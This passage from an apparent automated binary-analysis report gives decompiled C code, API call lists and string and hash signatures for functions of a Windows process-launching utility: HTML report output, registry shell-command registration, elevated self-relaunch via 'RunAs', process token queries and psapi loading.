                                                                                      						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
                                                                                      							goto L14;
                                                                                      						}
                                                                                      						_t153 = 0;
                                                                                      					}
                                                                                      				}
                                                                                      				L14:
                                                                                      				E00407343(_t124, _a4, L"</table><p>");
                                                                                      				return E00407343(_t124, _a4, L"\r\n");
                                                                                      			}
































                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                      • API String ID: 1607361635-601624466
                                                                                      • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                      • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                      • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                      • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 40%
                                                                                      			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
                                                                                      				void _v514;
                                                                                      				char _v516;
                                                                                      				void _v1026;
                                                                                      				long _v1028;
                                                                                      				void _v1538;
                                                                                      				char _v1540;
                                                                                      				void _v2050;
                                                                                      				char _v2052;
                                                                                      				char _v2564;
                                                                                      				char _v35332;
                                                                                      				char _t51;
                                                                                      				intOrPtr* _t54;
                                                                                      				void* _t61;
                                                                                      				intOrPtr* _t73;
                                                                                      				void* _t78;
                                                                                      				void* _t79;
                                                                                      				void* _t80;
                                                                                      				void* _t81;
                                                                                      
                                                                                      				E0040B550(0x8a00, __ecx);
                                                                                      				_v2052 = 0;
                                                                                      				memset( &_v2050, 0, 0x1fc);
                                                                                      				_v1540 = 0;
                                                                                      				memset( &_v1538, 0, 0x1fc);
                                                                                      				_v1028 = 0;
                                                                                      				memset( &_v1026, 0, 0x1fc);
                                                                                      				_t79 = _t78 + 0x24;
                                                                                      				if(_a20 != 0xffffffff) {
                                                                                      					_push(E0040ADC0(_a20,  &_v2564));
                                                                                      					_push(L" bgcolor=\"%s\"");
                                                                                      					_push(0xff);
                                                                                      					_push( &_v2052);
                                                                                      					L0040B1EC();
                                                                                      					_t79 = _t79 + 0x18;
                                                                                      				}
                                                                                      				if(_a24 != 0xffffffff) {
                                                                                      					_push(E0040ADC0(_a24,  &_v2564));
                                                                                      					_push(L"<font color=\"%s\">");
                                                                                      					_push(0xff);
                                                                                      					_push( &_v1540);
                                                                                      					L0040B1EC();
                                                                                      					wcscpy( &_v1028, L"</font>");
                                                                                      					_t79 = _t79 + 0x20;
                                                                                      				}
                                                                                      				_push( &_v2052);
                                                                                      				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
                                                                                      				_push(0x3fff);
                                                                                      				_push( &_v35332);
                                                                                      				L0040B1EC();
                                                                                      				_t80 = _t79 + 0x10;
                                                                                      				E00407343(_a4, _a8,  &_v35332);
                                                                                      				_t51 = _a16;
                                                                                      				if(_t51 > 0) {
                                                                                      					_t73 = _a12 + 4;
                                                                                      					_a20 = _t51;
                                                                                      					do {
                                                                                      						_v516 = 0;
                                                                                      						memset( &_v514, 0, 0x1fc);
                                                                                      						_t54 =  *_t73;
                                                                                      						_t81 = _t80 + 0xc;
                                                                                      						if( *_t54 == 0) {
                                                                                      							_v516 = 0;
                                                                                      						} else {
                                                                                      							_push(_t54);
                                                                                      							_push(L" width=\"%s\"");
                                                                                      							_push(0xff);
                                                                                      							_push( &_v516);
                                                                                      							L0040B1EC();
                                                                                      							_t81 = _t81 + 0x10;
                                                                                      						}
                                                                                      						_push( &_v1028);
                                                                                      						_push( *((intOrPtr*)(_t73 - 4)));
                                                                                      						_push( &_v1540);
                                                                                      						_push( &_v516);
                                                                                      						_push(L"<th%s>%s%s%s\r\n");
                                                                                      						_push(0x3fff);
                                                                                      						_push( &_v35332);
                                                                                      						L0040B1EC();
                                                                                      						_t80 = _t81 + 0x1c;
                                                                                      						_t61 = E00407343(_a4, _a8,  &_v35332);
                                                                                      						_t73 = _t73 + 8;
                                                                                      						_t36 =  &_a20;
                                                                                      						 *_t36 = _a20 - 1;
                                                                                      					} while ( *_t36 != 0);
                                                                                      					return _t61;
                                                                                      				}
                                                                                      				return _t51;
                                                                                      			}





















                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                      • API String ID: 2000436516-3842416460
                                                                                      • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                      • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                      • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                      • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 51%
                                                                                      			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                      				void* _v8;
                                                                                      				void* _v12;
                                                                                      				void* _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				short _v32;
                                                                                      				void _v2078;
                                                                                      				signed int _v2080;
                                                                                      				void _v4126;
                                                                                      				char _v4128;
                                                                                      				void _v6174;
                                                                                      				char _v6176;
                                                                                      				void _v8222;
                                                                                      				char _v8224;
                                                                                      				signed int _t49;
                                                                                      				short _t55;
                                                                                      				intOrPtr _t56;
                                                                                      				int _t73;
                                                                                      				intOrPtr _t78;
                                                                                      
                                                                                      				_t76 = __ecx;
                                                                                      				E0040B550(0x201c, __ecx);
                                                                                      				_t73 = 0;
                                                                                      				if(E004043F8( &_v8, 0x2001f) != 0) {
                                                                                      					L6:
                                                                                      					return _t73;
                                                                                      				}
                                                                                      				_v6176 = 0;
                                                                                      				memset( &_v6174, 0, 0x7fe);
                                                                                      				_t78 = _a4;
                                                                                      				_push(_t78 + 0x20a);
                                                                                      				_push(_t78);
                                                                                      				_push(L"%s\\shell\\%s\\command");
                                                                                      				_push(0x3ff);
                                                                                      				_push( &_v6176);
                                                                                      				L0040B1EC();
                                                                                      				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
                                                                                      					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
                                                                                      					asm("sbb ebx, ebx");
                                                                                      					_t73 =  ~_t49 + 1;
                                                                                      					RegCloseKey(_v12);
                                                                                      					_v2080 = _v2080 & 0x00000000;
                                                                                      					memset( &_v2078, 0, 0x7fe);
                                                                                      					E00404AD9( &_v2080);
                                                                                      					if(_v2078 == 0x3a) {
                                                                                      						_t55 =  *L"C:\\"; // 0x3a0043
                                                                                      						_v32 = _t55;
                                                                                      						_t56 =  *0x40ccdc; // 0x5c
                                                                                      						_v28 = _t56;
                                                                                      						asm("stosd");
                                                                                      						asm("stosd");
                                                                                      						asm("stosd");
                                                                                      						_v32 = _v2080;
                                                                                      						if(GetDriveTypeW( &_v32) == 3) {
                                                                                      							_v4128 = 0;
                                                                                      							memset( &_v4126, 0, 0x7fe);
                                                                                      							_v8224 = 0;
                                                                                      							memset( &_v8222, 0, 0x7fe);
                                                                                      							_push(_a4 + 0x20a);
                                                                                      							_push(_a4);
                                                                                      							_push(L"%s\\shell\\%s");
                                                                                      							_push(0x3ff);
                                                                                      							_push( &_v8224);
                                                                                      							L0040B1EC();
                                                                                      							_push( &_v2080);
                                                                                      							_push(L"\"%s\",0");
                                                                                      							_push(0x3ff);
                                                                                      							_push( &_v4128);
                                                                                      							L0040B1EC();
                                                                                      							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				RegCloseKey(_v8);
                                                                                      				goto L6;
                                                                                      			}





















                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00404452
                                                                                      • _snwprintf.MSVCRT ref: 00404473
                                                                                        • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                        • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                        • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                      • memset.MSVCRT ref: 004044CF
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                      • memset.MSVCRT ref: 00404539
                                                                                      • memset.MSVCRT ref: 0040454E
                                                                                      • _snwprintf.MSVCRT ref: 00404571
                                                                                      • _snwprintf.MSVCRT ref: 0040458A
                                                                                        • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                      • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                      • API String ID: 486436031-734527199
                                                                                      • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                      • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                      • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                      • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 87%
                                                                                      			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
                                                                                      				void _v530;
                                                                                      				char _v532;
                                                                                      				void _v1042;
                                                                                      				long _v1044;
                                                                                      				long _v4116;
                                                                                      				char _v5164;
                                                                                      				void* __edi;
                                                                                      				void* _t27;
                                                                                      				void* _t38;
                                                                                      				void* _t44;
                                                                                      
                                                                                      				E0040B550(0x142c, __ecx);
                                                                                      				_v1044 = 0;
                                                                                      				memset( &_v1042, 0, 0x1fc);
                                                                                      				_v532 = 0;
                                                                                      				memset( &_v530, 0, 0x208);
                                                                                      				E00404AD9( &_v532);
                                                                                      				_pop(_t44);
                                                                                      				E00405AA7( &_v5164);
                                                                                      				_t27 = E0040B04D( &_v5164,  &_v532);
                                                                                      				_t61 = _t27;
                                                                                      				if(_t27 != 0) {
                                                                                      					wcscpy( &_v1044,  &_v4116);
                                                                                      					_pop(_t44);
                                                                                      				}
                                                                                      				wcscpy(0x40fb90, _a8);
                                                                                      				wcscpy(0x40fda0, L"general");
                                                                                      				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
                                                                                      				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
                                                                                      				E00405FAC(_t61, L"Version",  &_v1044, 1);
                                                                                      				E00405FAC(_t61, L"RTL", "0", 0);
                                                                                      				EnumResourceNamesW(_a4, 4, E0040620E, 0);
                                                                                      				EnumResourceNamesW(_a4, 5, E0040620E, 0);
                                                                                      				wcscpy(0x40fda0, L"strings");
                                                                                      				_t38 = E00406337(_t44, _t61, _a4);
                                                                                      				 *0x40fb90 =  *0x40fb90 & 0x00000000;
                                                                                      				return _t38;
                                                                                      			}

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00406484
                                                                                      • memset.MSVCRT ref: 004064A0
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                        • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                        • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                        • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                        • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                        • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                        • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                        • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                      • wcscpy.MSVCRT ref: 004064E4
                                                                                      • wcscpy.MSVCRT ref: 004064F3
                                                                                      • wcscpy.MSVCRT ref: 00406503
                                                                                      • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                      • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                      • wcscpy.MSVCRT ref: 0040657A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                      • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                      • API String ID: 3037099051-2314623505
                                                                                      • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                      • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                      • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                      • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 75%
                                                                                      			E00401C26(long _a4) {
                                                                                      				struct _SHELLEXECUTEINFOW _v68;
                                                                                      				void _v582;
                                                                                      				char _v584;
                                                                                      				void _v1110;
                                                                                      				char _v1112;
                                                                                      				long _t23;
                                                                                      				int _t36;
                                                                                      				void* _t43;
                                                                                      				long _t44;
                                                                                      
                                                                                      				_t44 = 0;
                                                                                      				_t23 = GetCurrentProcessId();
                                                                                      				_v584 = 0;
                                                                                      				memset( &_v582, 0, 0x1fe);
                                                                                      				_v1112 = 0;
                                                                                      				memset( &_v1110, 0, 0x208);
                                                                                      				E00404AD9( &_v1112);
                                                                                      				_push(_t23);
                                                                                      				_push(0);
                                                                                      				_push(_a4);
                                                                                      				_push(L"/SpecialRun %I64x %d");
                                                                                      				_push(0xff);
                                                                                      				_push( &_v584);
                                                                                      				L0040B1EC();
                                                                                      				memset( &(_v68.fMask), 0, 0x38);
                                                                                      				_v68.lpFile =  &_v1112;
                                                                                      				_v68.lpParameters =  &_v584;
                                                                                      				_v68.cbSize = 0x3c;
                                                                                      				_v68.lpVerb = L"RunAs";
                                                                                      				_v68.fMask = 0x40;
                                                                                      				_v68.nShow = 5;
                                                                                      				_t36 = ShellExecuteExW( &_v68);
                                                                                      				_t43 = _v68.hProcess;
                                                                                      				if(_t36 == 0) {
                                                                                      					_t44 = GetLastError();
                                                                                      				} else {
                                                                                      					WaitForSingleObject(_t43, 0x5dc);
                                                                                      					_a4 = 0;
                                                                                      					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {
                                                                                      						_t44 = _a4;
                                                                                      					}
                                                                                      				}
                                                                                      				return _t44;
                                                                                      			}

                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                      • memset.MSVCRT ref: 00401C4F
                                                                                      • memset.MSVCRT ref: 00401C68
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • _snwprintf.MSVCRT ref: 00401C8F
                                                                                      • memset.MSVCRT ref: 00401C9B
                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                      • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                      • GetExitCodeProcess.KERNEL32 ref: 00401CF6
                                                                                      • GetLastError.KERNEL32 ref: 00401D0E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                      • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                      • API String ID: 903100921-3385179869
                                                                                      • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                      • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                      • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                      • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 44%
                                                                                      			E00409A94(long _a4, intOrPtr _a8) {
                                                                                      				int _v8;
                                                                                      				int _v12;
                                                                                      				int _v16;
                                                                                      				void* _v20;
                                                                                      				void* _v24;
                                                                                      				char _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				char _v36;
                                                                                      				char _v44;
                                                                                      				char _v52;
                                                                                      				char _v60;
                                                                                      				void _v315;
                                                                                      				char _v316;
                                                                                      				void _v826;
                                                                                      				char _v828;
                                                                                      				void _v1338;
                                                                                      				char _v1340;
                                                                                      				void* __esi;
                                                                                      				void* _t61;
                                                                                      				_Unknown_base(*)()* _t93;
                                                                                      				void* _t94;
                                                                                      				int _t106;
                                                                                      				void* _t108;
                                                                                      				void* _t110;
                                                                                      
                                                                                      				_v828 = 0;
                                                                                      				memset( &_v826, 0, 0x1fe);
                                                                                      				_v1340 = 0;
                                                                                      				memset( &_v1338, 0, 0x1fe);
                                                                                      				_t110 = _t108 + 0x18;
                                                                                      				_t61 = OpenProcess(0x400, 0, _a4);
                                                                                      				_t113 = _t61;
                                                                                      				_v20 = _t61;
                                                                                      				if(_t61 == 0) {
                                                                                      					L11:
                                                                                      					if(_v828 == 0) {
                                                                                      						__eflags = 0;
                                                                                      						return 0;
                                                                                      					}
                                                                                      					_push( &_v828);
                                                                                      					_push( &_v1340);
                                                                                      					_push(L"%s\\%s");
                                                                                      					_push(0xff);
                                                                                      					_push(_a8);
                                                                                      					L0040B1EC();
                                                                                      					return 1;
                                                                                      				}
                                                                                      				_v8 = 0;
                                                                                      				_v24 = 0;
                                                                                      				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
                                                                                      				_t106 = _v24;
                                                                                      				if(_t106 == 0) {
                                                                                      					_t32 =  &_v20; // 0x4059ec
                                                                                      					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
                                                                                      					_v316 = 0;
                                                                                      					memset( &_v315, 0, 0xfe);
                                                                                      					_t110 = _t110 + 0x20;
                                                                                      					_v16 = 0xff;
                                                                                      					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
                                                                                      					if(__eflags == 0) {
                                                                                      						L9:
                                                                                      						CloseHandle(_v20);
                                                                                      						if(_v8 != 0) {
                                                                                      							FreeLibrary(_v8);
                                                                                      						}
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					_push( &_v28);
                                                                                      					_push( &_a4);
                                                                                      					_push( &_v1340);
                                                                                      					_push( &_v12);
                                                                                      					_push( &_v828);
                                                                                      					_a4 = 0xff;
                                                                                      					_push( &_v316);
                                                                                      					L8:
                                                                                      					_v12 = 0xff;
                                                                                      					E0040906D( &_v8, _t117);
                                                                                      					goto L9;
                                                                                      				}
                                                                                      				_v316 = 0;
                                                                                      				memset( &_v315, 0, 0xff);
                                                                                      				_v12 = _t106;
                                                                                      				_t110 = _t110 + 0xc;
                                                                                      				_a4 = 0;
                                                                                      				if(E00408F72( &_v8) == 0) {
                                                                                      					goto L9;
                                                                                      				}
                                                                                      				_t93 = GetProcAddress(_v8, "GetTokenInformation");
                                                                                      				if(_t93 == 0) {
                                                                                      					goto L9;
                                                                                      				}
                                                                                      				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
                                                                                      				_t117 = _t94;
                                                                                      				if(_t94 == 0) {
                                                                                      					goto L9;
                                                                                      				}
                                                                                      				_push( &_v28);
                                                                                      				_push( &_v12);
                                                                                      				_push( &_v1340);
                                                                                      				_push( &_v16);
                                                                                      				_push( &_v828);
                                                                                      				_push(_v316);
                                                                                      				_v16 = 0xff;
                                                                                      				goto L8;
                                                                                      			}

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00409AB7
                                                                                      • memset.MSVCRT ref: 00409ACF
                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                      • _snwprintf.MSVCRT ref: 00409C5A
                                                                                        • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                      • memset.MSVCRT ref: 00409B25
                                                                                      • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                      • memset.MSVCRT ref: 00409BC7
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                      • String ID: %s\%s$GetTokenInformation$Y@
                                                                                      • API String ID: 3504373036-27875219
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00409172() {
                                                                                      				void* _t1;
                                                                                      				int _t2;
                                                                                      				struct HINSTANCE__* _t5;
                                                                                      
                                                                                      				if( *0x4101bc != 0) {
                                                                                      					return _t1;
                                                                                      				}
                                                                                      				_t2 = E00405436(L"psapi.dll");
                                                                                      				_t5 = _t2;
                                                                                      				if(_t5 == 0) {
                                                                                      					L10:
                                                                                      					return _t2;
                                                                                      				} else {
                                                                                      					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
                                                                                      					 *0x40f848 = _t2;
                                                                                      					if(_t2 != 0) {
                                                                                      						_t2 = GetProcAddress(_t5, "EnumProcessModules");
                                                                                      						 *0x40f840 = _t2;
                                                                                      						if(_t2 != 0) {
                                                                                      							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
                                                                                      							 *0x40f838 = _t2;
                                                                                      							if(_t2 != 0) {
                                                                                      								_t2 = GetProcAddress(_t5, "EnumProcesses");
                                                                                      								 *0x40fa6c = _t2;
                                                                                      								if(_t2 != 0) {
                                                                                      									_t2 = GetProcAddress(_t5, "GetModuleInformation");
                                                                                      									 *0x40f844 = _t2;
                                                                                      									if(_t2 != 0) {
                                                                                      										 *0x4101bc = 1;
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					if( *0x4101bc == 0) {
                                                                                      						_t2 = FreeLibrary(_t5);
                                                                                      					}
                                                                                      					goto L10;
                                                                                      				}
                                                                                      			}

                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                      • API String ID: 1182944575-70141382
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004090EE() {
                                                                                      				void* _t1;
                                                                                      				_Unknown_base(*)()* _t2;
                                                                                      				struct HINSTANCE__* _t4;
                                                                                      
                                                                                      				if( *0x4101b8 != 0) {
                                                                                      					return _t1;
                                                                                      				}
                                                                                      				_t2 = GetModuleHandleW(L"kernel32.dll");
                                                                                      				_t4 = _t2;
